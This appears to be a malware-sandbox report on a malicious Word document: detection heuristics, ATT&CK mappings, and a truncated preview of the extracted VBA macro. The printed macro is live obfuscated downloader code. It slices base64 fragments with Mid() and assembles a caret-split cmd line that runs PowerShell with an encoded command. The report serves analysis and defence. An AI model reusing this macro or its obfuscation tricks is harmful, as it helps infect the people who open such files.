MALICIOUS
244
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'AutoOpen' macro is present and triggers a 'Shell()' call, indicating execution of arbitrary code. The VBA script appears to be heavily obfuscated, but the presence of a 'Shell()' call and the ClamAV detection for 'Doc.Macro.Obfuscation' strongly suggest it's designed to download and execute a secondary payload. No specific family could be identified due to the obfuscation.
Heuristics 8
-
ClamAV: Doc.Macro.Obfuscation-6355576-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.Obfuscation-6355576-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8867 bytes |
SHA-256: 74764e7175cb0512fc66a0d1bef5990cb84b02c5a70efbdaeb51f54488dff2b9 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 23 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Sub JBduqlbqm() vRcUnYNPL = "8ORX9J6Z2ALL83TODYWRDX9DPCKAANQB0ADEAMQAwAGUAMwAyAFcAMwA2ADsAMQAxADcAZQAxADEANABxADEAMAA4AFcAMQAxADUAcQA0ADEAJgAxADIAMwAmADEAMQA2AHIAMQAxADQAcQAxADIAMQAmAD68H3O" jDRiMBBzAoQ = Mid(vRcUnYNPL, 28, 128) zrLNrOKi = jDRiMBBzAoQ hptPkh = "ICTOYIEAMgAzACYAMwA2AHsAMQAxADkAZQAxADAAMQByADkAOABXADkAOQBlADEAMAA4AFcAMQAwADUAVwAxADAAMQAmADEAMQAwAH0AMQAxADYAfQA0ADYAewA2ADgDIZRM8W5" TXTkJZhzEdr = Mid(hptPkh, 7, 121) PUfrFs = TXTkJZhzEdr HwPkTW = "7BYB1GR5344ON8SQDQ3FWPGTGOEFDEAMAAzAFcAMQAwADEAewA1ADkAZQAxADIANQB9ADEAMgA1ACcALgBTAFAATABJAFQAKAAgACcAcQB9AHQAJgByAGUAOwB7Y6H11QF" nKVWVrzq = Mid(HwPkTW, 29, 95) tMPpIkmKDSI = nKVWVrzq XMFhB = "4353XF9GQHOGP8AAxAGUAMQAwADcAcQAxADAAMQBjADEAMQC1BI83XT3NB" AJOrXf = Mid(XMFhB, 15, 33) anziALQt = AJOrXf GXQUZ = "ND93TQII1ADQAewA0ADEAZQA1ADkAJgAzADYAcQAxADEAMgAmADkANwB0ADEAMQA2ACYAMQAwADQAcQAzADIAcQA2ADEAcQAzADIAfQAzADYAdAAxADAAMQByADEAMQAwAHsAMQAxADgAfQA1ADgAfQAxADEANgB9ADEAMAAxAH0AMQAwADkAYwAxADEAMgB0ADMAMgAmADQAMwB9ADMAMgBjADMAOQBxADkAMgA7ADMAOQBlADMAMgB0ADQAMwB7ADMAMgBlAD5TAPBI91OC" UtzfPwHI = Mid(GXQUZ, 9, 259) jifHhYwtzE = UtzfPwHI zsSSJcLsB = "KEXHZAxADAAMQBlADEAMQA0ADsANAA5AHIANAA3AHEAMQAxADUAYwAxADAANAB7ADcAMAByADEAMQA4AGUAMQAyADAAfQA2ADUAcgA4ADYAJgA2ADcAZQAxADIAMABXADQANwB9ADQANABXADEAMAA0AGUAMQAxADYAZQAxADEANgB7ADEAMQAyAH0ANQA4AHQAM1QQG" Dfjrj = Mid(zsSSJcLsB, 6, 188) iRQVCX = Dfjrj aIPcOVtt = "94AMwBlADEAMQA2AGUAMQAxADQAOwAxADAANQBXADEAMQAwAHIAMQAwADMAOwA0ADAAdAA0ADEAcgA0ADQAcQAzADIAdAAzADYAfQAxADEAMgBXADkANwBxADEAMQA2AH0AMQAwADQAdAA0ADEAcgA1ADkAOwA4ADMAewAxADEANgBXADkANwByADEAMQA0AH0AMQAxADYAcQA0ADUAcQA4ADAAVwAxADEANAB0ADEAMQAxHD33C6BWIH7PMNVP63K00T3QVI48" dHwGHA = Mid(aIPcOVtt, 3, 237) DboiVcjJi = dHwGHA ZmOisITRM = "NXQAxADIAMAByADEAMAA1AHIAMQAxADUAOwAxADAAOAB0ADEAMQA3AHEAMQAwADkAYwAxADEAMgB7ADEAMQAyAGUANAA2AHQAMQAwADAAfQAxADAAMQBlADQANwB7ADYAOQB0ADcAMgB9ADEAMQA5AHIANAA3AHQAMwA5AHIANAA2AH0AOAAzAGUAMQAxADIAYwAxADAAOAA7ADEAMAA1AGUAMQAxAKL4U158TELRS7" wHzcGzEO = Mid(ZmOisITRM, 3, 220) trocoGzdR = wHzcGzEO BLtLvHBX = "I2K1GQT9GCEANQBxADMAMgBxADYAMQBjADMAMgASL" MtqlJaYufC = Mid(BLtLvHBX, 11, 29) MvQYDU = MtqlJaYufC aYTztb = "25CGY2N7Y7W9DQAAIF7ADMAOQB7ADEAMAA0AFcAMQAxADYAcgAxADEANgB7ADEAMQAyAHEANQA4AHIANAA3AHIANAA3AGUAMQAxADIAcQAxADEANwAmADEAMQA0ADsAMQAwADcAdAAxADAAOAA7ADQANgB0ADEAMAAwACYAMQAwADEAVwA0ADcAZQA3ADAAJgAxADEAMABlADEAMAAwAH0AMQAxADgAOwA3ADMAZQAxADAAMQAmADcAMgB9ADQANwBxADQANAAmADEAMAA0AFcAMQAxADYAJgAxADEANgB0ADEAMQAyAHsARK7XV0Z464U1" BZizLIzsI = Mid(aYTztb, 19, 293) FzjwzVrTi = BZizLIzsI kifzzkKc = "QATGR43OA0N1YADAAfQAxADAAMAByADEAMQAxAHIAMQAwADkAcQA1ADkAZQAzADYAYwAxADEANwAmADEAMQA0AHQAMQAwADgAVwAxAD0GIN1P" biOLu = Mid(kifzzkKc, 14, 90) cMPTf = biOLu aqqKOc = "WRY9FrACQAZQBOAFYAOgBQAFUAQgBMAGkAYwBbADUAXQArACcAWAAnACkAAB7X1UYQUPUGGSXGW4QIBYNM05F80" cGvQtp = Mid(aqqKOc, 6, 53) piKMKY = cGvQtp umPWIJczQ = "WRANABXADEAMAAxAFcAMQAwADgAcgAxADAAOAAmADUAOQB0ADMANgBjADEAMQA5AHsAMQAwADEAfQA5ADgAdAA5ADkAVwAxADAAOAAmADEAMAA1ADsAMQAwADEAcgAxADEAMAByADEAMQ9UKCXWXKM8MIUC93C" VEuWOQB = Mid(umPWIJczQ, 3, 139) wnEIJDV = VEuWOQB oTNDMNC = "5C1WMG0NOXT9LNQA4AFcANAA3AGUANAA3AH0ANQAxAGUAOQA5AHEAMQAwADMAcQAxADAAMgAmADEAMgAwAHIANAA2ADsAOQA5AHsAMQAxADEAVwAxADAAOQBXADQANwB9ADEAMgAwAHIAOQA3AHQAOAAxACYANAA3AHQANAA0AGMAMQAwADQAJgAxADEANgB0ADEAMQA2AHEAMQAxADIAcgA1ADgAOwA0ADcAOwA0ADcAVwAxADEANAA7ADEAM31VZINSHZ2YIVHKZ15P" MZFNaa = Mid(oTNDMNC, 14, 241) fcrLCdArHR = MZFNaa rvIlAwsnb = "Sset %JBduqlbqm%=p^owe^rs&&set %wrUAVlnmU%=he^ll&&!%JBduqlbqm%!!%wrUAVlnmU%! -e IAAoACcAMwA2ADsAMQAxADkAdAAxADEANQB7ADkAOQByADEAMQA0ACYAMQAwADUAZQAxADEAMgBlADEAMQA2AHEAMwAyAHIANgAxAHIAMwAyAHEAMQAxADAAOwAxADAAMQAmADEAMQA5ACYANA881OT1XRZXJDUNE278Z" mtMlB = Mid(rvIlAwsnb, 2, 225) OGbGtQTzmh = mtMlB NNtcXDo = "QJFYR945YJZ05N2FICAGMAVwAnACkAfABGAG8AU ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.